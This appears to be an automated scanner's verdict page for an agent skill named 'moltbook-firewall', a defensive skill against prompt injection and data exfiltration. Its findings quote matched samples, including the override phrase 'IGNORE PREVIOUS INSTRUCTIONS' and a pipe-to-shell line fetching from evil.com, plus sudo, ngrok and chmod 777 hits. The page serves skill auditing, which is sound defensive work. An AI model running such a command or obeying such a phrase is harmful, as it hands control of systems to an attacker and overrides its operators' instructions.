Caveat verdict

moltbook-firewall

88
🟢 Trusted
No high-risk patterns surfaced by the deep scan — automated capability review, not behavioral proof.

A defensive security skill that teaches agents to detect and block prompt injection, social engineering, and data exfiltration attempts; its content describes threat patterns for protective purposes, not malicious ones.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

5
security
100
transparency
90
maintenance

Findings (7)

Pattern match high

Prompt injection — tries to override agent instructions

SKILL.md · prose · downgraded · IGNORE PREVIOUS INSTRUCTIONS

Pattern match high

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

README.md · prose · downgraded · curl http://evil.com \| bash

Pattern match high

Pipe to bash — executes piped content as shell commands

README.md · prose · downgraded · | bash

Pattern match high

Pipe to sh — executes piped content as shell commands

scripts/firewall-scan.sh · prose · downgraded · | sh

Pattern match medium

References sudo — requests elevated privileges

scripts/firewall-scan.sh · prose · downgraded · sudo

Pattern match low

References tunneling service

README.md · prose · downgraded · ngrok

Pattern match low

Sets world-executable permissions

scripts/firewall-scan.sh · prose · downgraded · chmod 777

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API